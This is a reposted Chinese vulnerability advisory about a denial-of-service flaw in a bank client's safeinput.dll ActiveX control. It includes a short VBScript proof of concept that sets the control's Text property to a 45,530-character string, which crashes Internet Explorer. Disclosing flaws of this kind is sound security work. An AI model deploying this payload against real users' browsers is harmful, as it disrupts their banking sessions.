漏洞詳情

披露狀態：

2010-07-25： 積極聯系廠商并且等待廠商認領中，細節不對外公開
2010-07-25： 廠商已經主動忽略漏洞，細節向公眾公開

簡要描述：

北京宇信易誠是國內領先的網銀解決方案提供商，在國內擁有大量的銀行客戶(客戶列表http://www.yuchengtech.com/success.php)，但是其網銀客戶端安全控件safeinput.dll存在遠程拒絕服務漏洞可導致ie崩潰

詳細說明：

Text變量長度未做控制,如果提交的過長的參數,之后的操作會導致內存異常,使IE崩潰出錯
經過分析,該漏洞不能用來執行代碼.

漏洞證明：

<html> eChannels Century safeinput.dll test page <object classid='clsid:ECCBA953-80E5-11D3-9285-0080ADB811C5' id='target' ></object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\safeinput.dll" prototype = "Property Let Text As String" memberName = "Text" progid = "safeSetInputLib.safeInput" argCount = 1 arg1=String(45530, "A") target.Text = arg1 </script>

修復方案：

限制Text長度

版權聲明：轉載請注明來源?路人甲@烏云

總結

以上是生活随笔為你收集整理的宇信易诚网银客户端安全控件存在远程拒绝服务漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。